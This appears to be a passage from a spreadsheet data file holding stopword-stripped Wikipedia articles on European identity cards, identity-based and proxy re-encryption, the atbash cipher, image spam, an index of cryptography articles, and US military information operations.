dutch personalausweis german), carrying card times mandatory. foreigners residing belgium, similar cards (foreigner's cards, vreemdelingenkaart dutch, carte pour étrangers french) issued, although also carry passport, work permit, (temporary) residence permit. since 2000, newly issued belgian identity cards chip (eid card), roll-out cards expected complete course 2009. since 2008, aforementioned foreigner's card also replaced card, containing similar chip. cards used public private sector identification creation legally binding electronic signatures. until 2010 belgian consulates issued style cards (105 belgian citizens permanently residing jurisdiction chose registered consulate (which strongly advised). since 2011 belgian consulates issue electronic cards, electronic chip activated however. bulgaria bulgaria, obligatory possess identity card (bulgarian лична карта, lichna karta) above. person checked police without carrying least form identification liable fine bulgarian levs (about €25). croatia croatian citizens request identity card, called osobna iskaznica (literally personal card). persons must identity card carry times. refusal carry produce identity card police officer lead fine kuna detention individual's identity verified fingerprints. croatian card valid entire european union, also used travel throughout non-eu countries balkans. 2013 design croatian card prepared future installation electronic identity card chip, implementation 2014. cyprus acquisition possession civil identity card compulsory eligible person reached twelve years age. january 2015, announced future issued biometric. they applied citizen service centres (kep) consulates biometric data capturing facilities. card costs adults children 10/5 years validity respectively. valid travel document entire european union. czech republic czech, called občanský průkaz, identity card photo issued citizens czech republic officially recognised member states european union intra travel. travelling outside mostly requires czech passport. denmark denmark countries currently issue standard national identity cards (not counting driving licences passports issued purposes). danish citizens required carry identity card. traditional identity document (without photo), personal identification number certificate (danish:personnummerbevis) little danish society, largely replaced much versatile national health insurance card (danish:sundhedskortet) contains information more. national health insurance card issued citizens above. commonly referred identity card despite fact photo holder. both certificates retrieve information civil registration system. however, personnummerbevis still issued today since september 1968. danish driver's licenses passports identity cards issued government containing personal identification number photo. foreign citizen without driving skills living denmark cannot documents. foreign driving licenses passports accepted limitations. foreigner living denmark residence permit personal identification number photo. until 2004, national debit card dankort contained photo holder widely accepted identity card. danish banks lobbied successfully pictures removed national debit cards since 2004 dankort longer contained photo. hence rarely accepted identification. between 2004 2016, counties issued "photo identity card" (danish: billedlegitimationskort), used verification, limited identification purposes limited security issuing, valid travel. since 2017, municipalities issued identity cards (danish: legitimationskort), secure also valid identification purposes, still travel. since early 2018, possible nationality card order allow passage swedish border control, something sweden allowed 2019. cards still fully conform international travel document requirements approved travel, since gender birth date (although danish identity number, encoded) machine readable zone chip, registered travel document database prado. estonia estonian identity card (estonian: id-kaart) chipped picture republic estonia. estonian identity card officially recognised member states european union intra travel. travelling outside estonian citizens also require passport. card's chip stores pair, allowing users cryptographically sign digital documents based principles public cryptography using digidoc. under estonian law, since december 2000 cryptographic signature legally equivalent manual signature. estonian identity card also used authentication estonia's ambitious internet-based voting programme. february 2007, estonia first country world institute electronic voting parliamentary elections. over voters participated country's first e-election. 2014, european parliament elections, number e-voters increased 100,000 comprising total votes cast. finland finland, citizen identification card (henkilökortti/identitetskort). this, along passport, official identity documents. available electronic card (sähköinen henkilökortti/elektroniskt identitetskort), enables logging certain government services internet. driving licenses kela (social security) cards photo also widely used general identification purposes even though officially recognized such. however, kela ended practice issuing social security cards photograph bearer, become possible embed social security information onto national card. purposes identification required, valid documents card, passport driving license. however, citizen required carry these. france france national card citizens since beginning world 1940. compulsory identity documents created before, workers 1803 1890, nomads (gens voyage) 1912, foreigners 1917 world national identity cards first issued carte d'identité française october 1940, compulsory everyone identity cards valid years, updated within year case change residence, renewal required paying fee. under vichy regime, addition face photograph, family name, first names, date place birth, card included national identity number managed national statistics insee, also used national service registration number, social security account number health retirement benefits, access court files purposes. under decree 55-1397 october 1955 revised non-compulsory card, carte nationale d'identité (cni) introduced. (art. 78–1 78–6 french code criminal procedure (code procédure pénale) mentions check performed police, gendarmerie customs officer, prove identity means", validity left judgment enforcement official. though stated explicitly law, card, driving licence, passport, visa, carte séjour, voting card sufficient according jurisprudence. decision accept documents, without bearer's photograph, like social security card, travel card bank card, left discretion enforcement officer. according art. 78-2 french penal procedure code checks possible: alineas object</t>
  </si>
  <si>
    <t>Identity-based conditional proxy re-encryption</t>
  </si>
  <si>
    <t>identity-based conditional proxy re-encryption (ibcpre) type proxy re-encryption (pre) scheme identity-based public cryptographic setting. ibcpre scheme natural extension proxy re-encryption aspects. first aspect extend proxy re-encryption notion identity-based public cryptographic setting. second aspect extend feature proxy re-encryption support conditional proxy re-encryption. conditional proxy re-encryption, proxy ibcpre scheme re-encrypt ciphertext ciphertext would well-formed decryption condition applied onto ciphertext together re-encryption satisfied. this allows fine-grained proxy re-encryption useful applications secure sharing encrypted cloud data storage. introduction public-key encryption scheme allows anyone public receiver encrypt messages receiver using public corresponding private known receiver decrypt recover messages. public user, therefore, published allowing everyone encrypting messages user private user kept secret decryption purpose. both public corresponding private user generated user general.under identity-based cryptographic setting, public user arbitrary string bits, provided string uniquely identify user system. unique string, example, email address, phone number, staff used internally within organization). however, corresponding private longer generated user. from public key, unique binary string, generation center (kgc), generates issues private user. public key, assumed publicly known, encryption decryption work unique binary string defined public corresponding private key, respectively, respect kgc’s public key. proxy re-encryption allows ciphertext, originally decrypted user, transformed public entity, called proxy, another ciphertext another user also decrypt. suppose users alice bob. alice messages: intends encrypt public key, upload encrypted messages server. alice wants share encrypted messages bob, alice proxy re-encryption scheme allow server re-encrypt encrypted messages decrypt re-encrypted messages directly using private key. proxy re-encryption scheme, alice uses private public generate re-encryption key. alice sends re-encryption server. upon receiving re-encryption key, server uses transform encrypted messages form denoted download decrypt them, recover messages using private key. identity-based conditional proxy re-encryption (ibcpre) system, users public keys unique identities users. main advantages using identity-based cryptographic algorithms elimination public certificates, help enhance usability target security applications. term ‘conditional’ ibcpre refers additional feature, allows encrypted message ‘tag’ associated with. addition tag, re-encryption also ‘tag’ attached. ibcpre designed encrypted message matches re-encryption encrypted message re-encrypted. features features ibcpre data owner encrypts messages, encryption done decrypt encrypted messages using secret key. there need know advance would like share encrypted messages with. words, picking friends share done encrypt messages uploads server. another feature ibcpre supports end-to-end encryption. server stores encrypted messages cannot decrypt messages re-encryption. ibcpre supports one-to-many encryption. data owner choose multiple friends share data with. multiple friends share encrypted messages with, owner simply needs generate re-encryption friends send re-encryption keys server carrying re-encryption. number re-encryption keys need generate depends number friends want share encrypted messages with. depend number encrypted messages. re-encryption allow server convert encrypted messages, provided encrypted messages re-encryption matches. conditional ‘tag’ ibcpre facilitates fine-grained access encrypted messages. setting different values onto different encrypted messages, data owner control exact encrypted messages want share particular friends theirs, great flexibility. applications consider user alice encrypts messages ‘private’, mt+1, mt+2, ‘tosharewithfamily’, mm+1, mm+2, ‘tosharewithfriend’, using ibcpre unique identity, considered public alice. alice uploads corresponding encrypted messages ct+1, cm+1, server. when alice share mm+1, mm+2, another user bob, becomes friend recently, alice generates re-encryption using ibcpre associated ‘tosharewithfriend’. this generation done taking input alice’s private bob’s identity. then alice sends re-encryption server. using re-encryption key, server runs ibcpre re-encryption function cm+1, cm+2, transforming another form, dm+1, dm+2, decrypt directly using private key. this transformation done associated encrypted messages, namely ‘tosharewithfriend’, matches associated re-encryption key. note server cannot transform ct+1, another form decrypt using re-encryption encrypted messages, namely ‘private’ 'tosharewithfamily', match re-encryption key. also note server cannot retrieve messages time. ibcpre used secure cloud data sharing related management solutions products atcipher limited. schemes security related concept proxy re-encryption called decrypt right delegation introduced mambo okamoto 1997. then 1998, blaze, bleumer strauss formalized notion proxy re-encryption giving definition algorithms proxy re-encryption scheme. authors also proposed scheme achieving chosen-plaintext security (cpa-security). later various schemes proposed.in 2007, green ateniese ivan dodis independently proposed several proxy re-encryption schemes identity-based cryptographic setting. this type scheme usually called identity-based proxy re-encryption (ibpre). schemes unidirectional, namely, re-encryption party re-encrypt cipher-texts another party, vice versa. re-encryption generated direction re-encryption. terms security, security analyses schemes done random oracle model. cpa-secure, multi-hop chosen-ciphertext-attack-secure (cca-secure), single-hop. schemes, however, collusion resistant. this means proxy colludes corresponding delegatee, private delegator compromised. cpa-secure ibpre schemes secure without random oracles subsequently proposed matsuo mizuno doi.type-based conditional (cpre) designed ensure proxy re-encrypt ciphertext tagged specific condition re-encryption given delegator tagged condition. identity-based cpre (ibcpre) schemes proposed achieve conditional control re-encryption identity-based re-encryption liang al., achieved security standard model, shao achieved security random oracle model. also id-based encryption id-based cryptography proxy re-encryption references</t>
  </si>
  <si>
    <t>Sheshach</t>
  </si>
  <si>
    <t>sheshach (hebrew: ששך), whose king mentioned hebrew bible jeremiah 25:26, supposed equivalent babel (babylon), according secret mode writing practiced among jews unknown antiquity, consisted substituting last letter hebrew alphabet first, next last second, thus letters become i.e., babel (see: atbash cipher). this code called atbash cipher utilized decrypt. city "sheshach" appear documents, save book jeremiah. atbash cipher applied "sheshach" came word "babel". this supposed confirmed reference jeremiah 51:41, sheshach babylon parallel clauses. there seems reason doubt babylon intended name.a similar instance hebrew cryptographic method occurs jeremiah 51:1, kamai code chaldea. references this article incorporates text publication public domain: easton, matthew george (1897). easton's bible dictionary (new revised ed.). nelson sons. {{cite encyclopedia}}: missing empty |title= (help)</t>
  </si>
  <si>
    <t>Identity-based cryptography</t>
  </si>
  <si>
    <t>identity-based cryptography type public-key cryptography publicly known string representing individual organization used public key. public string could include email address, domain name, physical address. first implementation identity-based signatures email-address based public-key infrastructure (pki) developed shamir 1984, allowed users verify digital signatures using public information user's identifier. under shamir's scheme, trusted third party would deliver private user verification user's identity, verification essentially required issuing certificate typical pki. shamir similarly proposed identity-based encryption, appeared particularly attractive since need acquire identity's public prior encryption. however, unable come concrete solution, identity-based encryption remained open problem many years. first practical implementations finally devised sakai 2000, boneh franklin 2001. these solutions based bilinear pairings. also 2001, solution developed independently clifford cocks.closely related various identity-based encryption schemes identity based agreement schemes. first identity based agreement algorithms published 1986, years shamir's identity based signature. author okamoto. identity based agreement schemes also allow "escrow free" identity based cryptography. notable example escrow free identity based agreement mccullagh-barreto's "authenticated agreement without escrow" found section 2004 paper, two-party identity-based authenticated agreement." variant escrow free exchange standardized identity based agreement chinese identity based standard sm9. usage identity-based systems allow party generate public known identity value ascii string. trusted third party, called private generator (pkg), generates corresponding private keys. operate, first publishes master public key, retains corresponding master private (referred master key). given master public key, party compute public corresponding identity combining master public identity value. obtain corresponding private key, party authorized identity contacts pkg, uses master private generate private identity limitation identity-based systems characteristic problem operation. suppose alice users system. since information needed find alice's public completely determined alice's master public key, possible revoke alice's credentials issue credentials without either changing alice's (usually phone number email address appear corporate directory); changing master public re-issuing private keys users, including bob.this limitation overcome including time component (e.g. current month) identity. also id-based encryption identity-based conditional proxy re-encryption chinese national identity based cryptography standard sakai–kasahara identity based encryption boneh–franklin references</t>
  </si>
  <si>
    <t>Image spam</t>
  </si>
  <si>
    <t>image-based spam, image spam, kind email spam textual spam message embedded images, attached spam emails. since email clients display image file directly user, spam message conveyed soon email opened (there need open attached image file). technique goal image spam clearly circumvent analysis email’s textual content performed spam filters (e.g., spamassassin, radicalspam, bogofilter, spambayes). accordingly, reason, together attached image, often spammers “bogus” text email, namely, number words likely appear legitimate emails spam. earlier image spam emails contained spam images text clean easily readable, shown fig. detection consequently, optical character recognition tools used extract text embedded spam images, could processed together text email’s body spam filter, generally, sophisticated text categorization techniques. further, signatures (e.g., hashing) also generated easily detected block already known spam images. spammers turn reacted applying obfuscation techniques spam images, similarly captchas, prevent embedded text read tools, mislead signature-based detection. some examples shown fig. this raised issue improving image spam detection using computer vision pattern recognition techniques.in particular, several authors investigated possibility recognizing image spam obfuscated images using generic low-level image features (like number colours, prevalent colour coverage, image aspect ratio, text area), image metadata, etc. (see comprehensive survey). notably, authors also tried detecting presence text attached images artifacts denoting adversarial attempt obfuscate history image spam started 2004 peaked 2006, spam image spam. mid-2007, started declining, practically disappeared 2008. reason behind phenomenon easy understand. decline image spam probably attributed improvement proposed countermeasures (e.g., fast image spam detectors based visual features), higher requirements terms bandwidth image spam force spammers send smaller amount spam given time interval. both factors might made image spam less convenient spammers kinds spam. nevertheless, 2011 rebirth image spam detected, image spam reached spam traffic, albeit small period. also anti-spam techniques email spam references</t>
  </si>
  <si>
    <t>Index of cryptography articles</t>
  </si>
  <si>
    <t>articles related cryptography include: a5/1 a5/2 digital signature guidelines (stream cipher) abraham sinkov acoustic cryptanalysis adaptive chosen-ciphertext attack adaptive chosen plaintext chosen ciphertext attack advantage (cryptography) adfgvx cipher shamir advanced access content system advanced encryption standard advanced encryption standard process adversary aead block cipher modes operation affine cipher agnes meyer driscoll (security) akelarre (cipher) alan turing alastair denniston bhed language alex biryukov alfred menezes algebraic eraser algorithmically random sequence alice all-or-nothing transform alphabetum kaldeorum alternating step generator american cryptogram association an/cyz-10 anonymous publication anonymous remailer antoni palluth anubis (cipher) argon2 aria (cipher) arlington hall arne beurling arnold cipher array controller based encryption arthur scherbius arvid gerhard damm asiacrypt atbash attack model auguste kerckhoffs authenticated encryption authentication authorization certificate autokey cipher avalanche effect b-dienst babington plot baby-step giant-step bacon's cipher banburismus bart preneel baseking bassomatic baton bb84 beale ciphers bear lion ciphers beaufort cipher beaumanor hall bent function berlekamp–massey algorithm bernstein united states bestcrypt biclique attack bid/60 bifid cipher bill weisband binary goppa code biometric word list birthday attack bit-flipping attack bittorrent protocol encryption biuro szyfrów black chamber blaise vigenère bletchley park blind credential blinding (cryptography) blind signature block cipher block cipher mode operation block size (cryptography) blowfish (cipher) blum blum shub blum–goldwasser cryptosystem bomba (cryptography) bombe book cipher books cryptography boomerang attack boris hagelin bouncy castle (cryptography) broadcast encryption bruce schneier brute-force attack brute force: cracking data encryption standard burrows–abadi–needham logic burt kaliski c2net c-36 (cipher machine) c-52 (cipher machine) caesar cipher camellia (cipher) capicom capstone (cryptography) cardan grille card catalog (cryptology) carlisle adams cast-128 cast-256 cayley–purser algorithm cbc-mac mode ccmp cd-57 cdmf cellular message encryption algorithm centiban central security service centre applied cryptographic research central bureau certicom certificate authority certificate-based encryption certificateless cryptography certificate revocation list certificate signing request certification path validation algorithm chaffing winnowing challenge-handshake authentication protocol challenge–response authentication chosen-ciphertext attack chosen-plaintext attack ciks-1 cipher disk cipher runes cipher security summary ciphersaber ciphertext expansion ciphertext indistinguishability ciphertext-only attack ciphertext stealing cipherunicorn-a cipherunicorn-e classical cipher claude shannon claw-free permutation cleartext clefia clifford cocks clipper chip clock (cryptography) clock drift cmvp coconut98 codebook code (cryptography) code talker codress message cold boot attack collision attack collision resistance colossus computer combined cipher machine commitment scheme common scrambling algorithm communications security communications security establishment communication theory secrecy systems comparison disk encryption software comparison clients completeness (cryptography) complexity trap computational diffie–hellman assumption computational hardness assumption computer insecurity computer network surveillance comsec equipment conch (ssh) concrete security conel hugh o'donel alexander confidentiality confusion diffusion content-scrambling system controlled cryptographic item corkscrew (program) correlation immunity cosic covert channel cover (telecommunications) crab (cipher) cramer–shoup cryptosystem cram-md5 crhf crib (cryptanalysis) crosscrypt crowds (anonymity network) crypt cryptanalysis cryptanalysis enigma cryptanalysis lorenz cipher cryptanalytic computer cryptex cryptico crypto crypto-anarchism crypto (linux) microsoft cryptoapi cryptobuddy cryptochannel crypto (conference) cryptogram cryptographically generated address cryptographically secure pseudorandom number generator cryptographically strong cryptographic application programming interface cryptographic hash function cryptographic types cryptographic message syntax cryptographic primitive cryptographic protocol cryptographic service provider cryptographie indéchiffrable cryptography cryptography japan cryptography newsgroups cryptography standards crypto: code rebels beat government—saving privacy digital cryptologia cryptology eprint archive cryptology research society india cryptomathic cryptome cryptomeria cipher cryptonomicon cryptool crypto phone crypto-society cryptosystem cryptovirology cryptrec cs-cipher curve25519 curve448 custom hardware attack cycles byte cyclometer cypherpunk cyrillic projector d'agapeyeff cipher daniel bernstein data authentication algorithm data encryption standard datagram transport layer security david chaum david kahn david naccache david wagner david wheeler (computer scientist) davies attack davies–meyer hash deal decipherment decisional diffie–hellman assumption decorrelation theory decrypt decss defence signals directorate degree anonymity delegated path discovery delegated path validation deniable encryption derek taunt derived unique transaction challenges supplementary material des-x deterministic encryption (cipher) dictionary attack differential cryptanalysis differential-linear attack differential power analysis diffie–hellman exchange diffie–hellman problem digicipher digital fortress digital rights management digital signature digital signature algorithm digital signature forgery digital timestamping digital watermarking dilly knox dining cryptographers problem diplomatic direct anonymous attestation discrete logarithm disk encryption disk encryption hardware disk encryption software distance-bounding protocol distinguishing attack distributed.net attack dm-crypt dmitry sklyarov domainkeys coppersmith dorabella cipher double ratchet algorithm doug stinson dragon (cipher) dryad dual_ec_drbg (cipher) (cipher) eap-aka eap-sim mode patents echelon ecrypt edouard fleissner wostrowitz edward hebern edward scheidt edward travis cracker efficient probabilistic public-key encryption scheme ekms electronic communications 2000 electronic money electronic signature electronic voting elgamal encryption elgamal signature scheme biham elizebeth friedman elliptic-curve cryptography elliptic-curve diffie–hellman elliptic curve eddsa elliptic curve hash elonka dunin encrypted function encrypted exchange encrypting file system encryption encryption software enigmail enigma machine enigma rotor details entrust ernst fetterlein estream étienne bazeries eurocrypt eurocrypt export cryptography extensible authentication protocol fast software encryption fast syndrome-based hash fea-m feal feige–fiat–shamir identification scheme feistel cipher félix delastelle fialka filesystem-level encryption filevault fill device financial cryptography fips fips 140-2 firefly (key exchange protocol) fish (cipher) fish (cryptography) floradora fluhrer, mantin shamir attack format-preserving encryption fortezza fort george meade fortuna (prng) four-square cipher franciszek pokorny frank stevenson frank rowlett freenet freeotfe frees/wan frequency analysis friedrich kasiski fritz-chip frog frostburg full disk encryption full domain hash winterbotham galois/counter mode gardening (cryptanalysis) gchq bude gchq morwenstow gdes generic security services application program interface george blakley george scovell encryption scheme signature scheme gilbert vernam (cryptography) privacy guard gnutls goldwasser–micali cryptosystem gordon welchman gost (block cipher) gost (hash function) government communications headquarters government communications security bureau grain (cipher) grand (cipher) great cipher grill (cryptology) grille (cryptography) group-based cryptography group signature grover's algorithm gustave bertrand gwido langer h.235 haifa construction haipe hans dobbertin hans-thilo schmidt hard-core predicate hardware random number generator hardware security module harold keen harry hinsley harvest (computer) has-160 hash-based cryptography hashcash hash chain hash function security summary hash list hasty pudding cipher haval hc-256 hc-9 heath robinson (codebreaking machine) hebern rotor machine henri braquenié henryk zygalski herbert yardley hidden field equations hideki imai hierocrypt high-bandwidth digital content protection higher-order differential cryptanalysis hill cipher history cryptography hmac hmac-based one-time password algorithm (hotp) horst feistel howard heys https hugo hadwiger hugo koch hushmail hx-63 hybrid cryptosystem hyperelliptic curve cryptography hyper-encryption goldberg 4758 (cipher) id-based cryptography idea identification friend ieee 802.11i ieee p1363 good illegal prime impossible differential cryptanalysis index coincidence indifferent chosen-ciphertext attack indistinguishability obfuscation indocrypt information leakage information security group information-theoretic security initialization vector integer factorization integral cryptanalysis integrated encryption scheme integrated windows authentication interlock protocol intermediate certificate authorities international association cryptologic research international data encryption algorithm internet exchange internet security association management protocol interpolation attack invisible ipsec iraqi block cipher isaac (cipher) 19092-2 iso/iec 9797 ivan damgård jacques stern jade (cypher machine) james gillogly james ellis james massey graliński kowalewski japanese naval codes java cryptography architecture jefferson disk jennifer seberry jerzy różycki joan daemen johannes trithemius john herivel john kelsey (cryptanalyst) john jeffreys john tiltman lech johansen josef pieprzyk joseph desch joseph finnegan (cryptographer) joseph mauborgne joseph rochefort journal cryptology junger daley kaisa nyberg kalyna (cipher) kasiski examination kasumi kcdsa keepass kerberos (protocol) kerckhoffs's principle kevin mccurley (cryptographer) key-agreement protocol authentication clustering (cryptography) derivation function distribution center escrow exchange keyfile generation generator management key-recovery attack schedule server (cryptographic) signature (cryptography) keysigning signing party size space (cryptography) keystream stretching whitening kg-84 khazad khufu khafre kiss (cryptanalysis) kl-43 kl-51 kl-7 kleptography kn-cipher knapsack problem known-key distinguishing attack known-plaintext attack knownsafe koi-18 kov-14 kryha kryptos ksd-64 kupyna kuznyechik kw-26 kw-37 ky-3 ky-57 ky-58 ky-68 kyk-13 lacida ladder-des lamport signature lars knudsen lattice-based cryptography laurance safford lawrie brown lcs35 marks leonard adleman leon battista alberti rosen leslie yoxall leviathan (cipher) (cipher) libelle (cipher) linear cryptanalysis linear-feedback shift register link encryption list ciphertexts list cryptographers list cryptographic file systems list cryptographic types list cryptology conferences list telecommunications encryption terms list people associated bletchley park list sftp clients list sftp server software loki loki97 lorenz cipher louis tordella lucifer (cipher) lyra2 (cipher) (cipher) m-209 m-325 m-94 macguffin (cipher) madryga magenta magic (cryptography) maksymilian ciężki malcolm williamson malleability (cryptography) man-in-the-middle attack marian rejewski mars (cryptography) martin hellman marutukku massey–omura cryptosystem matt blaze matt robshaw newman mceliece cryptosystem mcrypt (cryptography) md5crk mdc-2 matrix mean shortest distance meet-in-the-middle attack mental poker mercury (cipher machine) mercy (cipher) meredith gardner merkle signature scheme merkle–damgård construction merkle–hellman knapsack cryptosystem merkle's puzzles merkle tree mesh (cipher) message authentication message authentication code message forgery michael luby mickey microdot military cryptanalysis (book) (william friedman) military cryptanalytics mimic function mirror writing misty1 mitsuru matsui (cipher) cryptanalysis ms-chap mugi multi-s01 multiswap multivariate cryptography national communications centre national cryptologic museum national security agency national cipher challenge navajo neal koblitz needham–schroeder protocol negligible function nema (machine) nessie network security services neural cryptography data seal newdes n-hash nicolas courtois niederreiter cryptosystem niels ferguson nigel grey nihilist cipher nikita borisov nimbus (cipher) nist hash function competition nonlinear-feedback shift register noekeon non-malleable codes noreen nothing sleeve number cryptography encryption systems fiction nsakey suite cryptography suite cryptography manager ntlmssp ntruencrypt ntrusign null cipher numbers station nush ntru oblivious transfer mode oded goldreich off-the-record messaging okamoto–uchiyama cryptosystem cryptograph omni (scip) one-key one-time one-time password one-way compression function one-way function onion routing online certificate status protocol op-20-g openpgp card openssh openssl openswan openvpn operation ruthless optimal asymmetric encryption padding over rekeying (otar) otfe otway–rees protocol padding (cryptography) padding oracle attack paillier cryptosystem pairing-based cryptography panama (cryptography) partitioning cryptanalysis passive attack passphrase password password-authenticated agreement password cracking password hashing competition paul kocher paulo pancatuccio paulo barreto paul oorschot pbkdf2 bruno pepper (cryptography) perfect forward secrecy perforated sheets permutation cipher peter gutmann (computer scientist) peter junger peter twinn corporation pgpdisk pgpfone phelix phil zimmermann photuris (protocol) physical security physical unclonable function latin pigpen cipher pike (cipher) piling-up lemma pinwheel (cryptography) piotr smoleński pirate decryption (conference) pkcs pkcs pkcs pkix plaintext plaintext-aware encryption playfair cipher plugboard pmac (cryptography) poem code pohlig–hellman algorithm point-to-point tunneling protocol pointcheval–stern signature algorithm poly1305 polyalphabetic cipher polybius square portex post-quantum cryptography post-quantum cryptography standardization power analysis preimage attack pre-shared pretty good privacy printer steganography privacy-enhanced electronic mail private communications technology private information retrieval probabilistic encryption product cipher proof-of-work system protected extensible authentication protocol provable security provably secure cryptographic hash function proxy re-encryption pseudo-hadamard transform pseudonymity pseudorandom function pseudorandom number generator pseudorandom permutation public certificate public-key cryptography public fingerprint public infrastructure purple putty (cipher) (cipher) qrpff quad (cipher) quadratic sieve quantum coin flipping quantum cryptography quantum digital signature quantum fingerprinting quantum distribution rabbit (cipher) rabin cryptosystem rabin–williams encryption radiogatún rail fence cipher rainbow table ralph merkle rambutan (cryptography) random function randomness tests random number generator attack random oracle rebound attack reciprocal cipher red/black concept redoc pike (cipher) reflector (cipher machine) regulation investigatory powers 2000 reihenschieber rekeying (cryptography) related-key attack replay attack reservehandverfahren residual block termination rijndael schedule rijndael s-box ring signature ripemd winkle cipher robert morris (cryptographer) robot certificate authority rockex rolf noskwith rivest room root certificate ross anderson rossignols rot13 rotor machine rsa-100 rsa-1024 rsa-110 rsa-120 rsa-129 rsa-130 rsa-140 rsa-150 rsa-1536 rsa-155 rsa-160 rsa-170 rsa-180 rsa-190 rsa-200 rsa-2048 rsa-210 rsa-220 rsa-230 rsa-232 rsa-240 rsa-250 rsa-260 rsa-270 rsa-280 rsa-290 rsa-300 rsa-309 rsa-310 rsa-320 rsa-330 rsa-340 rsa-350 rsa-360 rsa-370 rsa-380 rsa-390 rsa-400 rsa-410 rsa-420 rsa-430 rsa-440 rsa-450 rsa-460 rsa-470 rsa-480 rsa-490 rsa-500 rsa-576 rsa-617 rsa-640 rsa-704 rsa-768 rsa-896 rsa-pss factoring challenge problem secret-key challenge security rubber-hose cryptanalysis running cipher russian copulation block cipher safer salsa20 salt (cryptography) card security support provider interface saml saville sc2000 schnorr group schnorr signature schoof–elkies–atkin algorithm scip scott vanstone scrambler scramdisk scream (cipher) scrypt scytale seahorse (software) seal (cipher) sean murphy (cryptographer) secg secret broadcast secret decoder ring secrets lies (schneier) secret sharing sectéra secure module secure access module secure channel secure communication based quantum cryptography secure copy secure cryptoprocessor secure electronic transaction secure hash algorithms secure hypertext transfer protocol secure issuing cryptography secure multi-party computation secure neighbor discovery secure real-time transport protocol secure remote password protocol secure shell secure telephone secure terminal equipment secure voice securid security association security engineering security level security parameter security protocol notation security obscurity security token seed selected areas cryptography self-certifying file system self-shrinking generator self-signed certificate semantic security serge vaudenay serpent (cipher) session shacal shafi goldwasser sha-1 sha-2 sha-3 shared secret shark shaun wylie shor's algorithm shrinking generator shugborough inscription side-channel attack siemens halske sigaba sigcum sigint signal protocol signal intelligence service signcryption sigsaly silc (protocol) silvio micali simple authentication security layer simple public-key infrastructure simple cipher s/key skein (hash function) skipjack (cipher) slide attack slidex small subgroup confinement attack s/mime algorithm (formerly sms4) snake (cryptography) snefru snow snuffle sober-128 solitaire (cipher) solomon kullback sosemanuk special collection service spectr-h64 speke (cryptography) sponge function spnego square (cipher) ssh-agent ssh-keygen file transfer protocol ssleay stafford tavares standard model (cryptography) station cast station hypo station-to-station protocol statistical cryptanalysis stefan lucks steganalysis steganography straddling checkerboard stream cipher stream cipher attacks strong cryptography strong assumption stuart milner-barry stu-ii stu-iii stunnel substitution substitution cipher substitution–permutation network superencryption supersingular isogeny exchange swedish national defence radio establishment swifft sxal/mbal symmetric-key algorithm syskey tabula recta taher elgamal tamper resistance tcpcrypt television encryption tempest template:cryptographic software temporal integrity protocol testery thawte alphabet cipher code book codebreakers gold-bug magic words squeamish ossifrage theory cryptography conference world wonders thomas jakobsen three-pass protocol threshold shadow scheme ticom tiger (cryptography) timeline cryptography time/memory/data tradeoff attack time-based one-time password algorithm (totp) timing attack tiny encryption algorithm berson tommy flowers topics cryptography (anonymity network) torus-based cryptography traffic analysis traffic-flow security traitor tracing transmission security transport layer security transposition cipher trapdoor function trench code treyfer trifid cipher triple trivium (cipher) truecrypt truncated differential cryptanalysis trusted third party turing (cipher) twinkle twirl twofish two-square cipher type encryption type encryption type encryption type encryption typex (cipher) ultra umac unbalanced vinegar undeniable signature unicity distance universal composability universal one-way hash function (uowhf) venona project verifiable secret sharing verisign very smooth hash vest cipher videocrypt vigenère cipher vincent rijmen vinson virtual private network visual cryptography voynich manuscript wadsworth's cipher wake wlan authentication privacy infrastructure watermark (data file) watermarking attack weak trust whirlpool (hash function) whitfield diffie wide mouth frog protocol wi-fi protected access william friedman william montgomery (cryptographer) winscp wired equivalent privacy wireless transport layer security witness-indistinguishable proof workshop cryptographic hardware embedded systems world cryptography world cryptography tutte x.509 assumption xiaoyun wang encryption signature attack xtea xuejia xxtea 10-00-00-00-00 yarrow algorithm y-stations yuliang zheng zeroisation zero-knowledge password proof zero-knowledge proof zfone zodiac (cipher) zrtp zimmermann–sassaman key-signing protocol zimmermann telegram also outline cryptography analytical list articles terms. books cryptography annotated list suggested readings. list cryptographers annotated list cryptographers. important publications cryptography cryptography papers computer science. wikiproject cryptography discussion resources editing cryptography articles.</t>
  </si>
  <si>
    <t>Information Operations (United States)</t>
  </si>
  <si>
    <t>information operations category direct indirect support operations united states military. definition joint publication 3-13, described integrated employment electronic warfare (ew), computer network operations (cno), psychological operations (psyop), military deception (mildec), operations security (opsec), concert specified supporting related capabilities, influence, disrupt, corrupt usurp adversarial human automated decision making protecting own." information operations (io) actions taken affect adversary information information systems defending one's information information systems. information operations (io) electronic warfare (ew) electronic warfare (ew) refers action involving electromagnetic spectrum directed energy control spectrum, attack enemy, impede enemy assaults spectrum. purpose electronic warfare deny opponent advantage ensure friendly unimpeded access spectrum. applied air, sea, land, space manned unmanned systems, target communication, radar, services. includes three major subdivisions: electronic attack (ea), electronic protection (ep), electronic warfare support (es). core capability. contributes success using offensive defensive tactics techniques variety combinations shape, disrupt, exploit adversarial spectrum protecting friendly freedom action spectrum. expanding reliance spectrum informational purposes increases potential challenges increasing prevalence wireless telephone computer usage extends utility threat offering opportunities exploit adversary's electronic vulnerabilities requirement identify protect similar exploitation. spectrum become universal military operations, become involved aspects core, supporting, related capabilities either directly indirectly benefit order coordinate deconflict broadly military usage spectrum, electronic warfare coordination cell (ewcc) established reside component commander appropriate operation. addition, joint operations require joint restricted frequency list (jrfl). this list specifies protected, guarded, taboo frequencies normally disrupted without prior coordination planning, either friendly friendly exploitation. this maintained promulgated communications system directorate joint staff (j-6) coordination joint commander's electronic warfare staff ewcc, delegated). domination electromagnetic spectrum. emphasizes maximum control entire electromagnetic spectrum, including capability disrupt current future communication systems, sensors, weapons systems. this include: navigation warfare, including methods offensive space operations global positioning satellites disrupted; methods control adversary radio systems; and, methods place false images onto radar systems, block directed energy weapons, misdirect unmanned aerial vehicles (uavs) robots operated adversaries. computer network operations (cno) core capability. increasing reliance unsophisticated militaries terrorist groups computers computer networks pass information forces reinforces importance plans activities. capability computers range employment broadens, vulnerabilities opportunities continue develop. this offers opportunities attack exploit adversary's computer system weaknesses requirement identify protect similar attack exploitation. computer network attack (cna). actions taken computer networks disrupt, deny, degrade, destroy information resident computers computer networks, computers networks themselves. also called cna. computer network defense (cnd). actions taken computer networks protect, monitor, analyze, detect respond unauthorized activity within department defense information systems computer networks. also called cnd.computer network exploitation. enabling operations intelligence collection capabilities conducted computer networks gather data target adversary automated information systems networks. also called cne. psychological operations (psyop) psyop core capability. psyop central role achievement objectives support jfc. today's information environment even psyop conducted tactical level strategic effects. therefore, psyop approval process must understood necessity timely decisions fundamental effective psyop this particularly important early stages operation given time 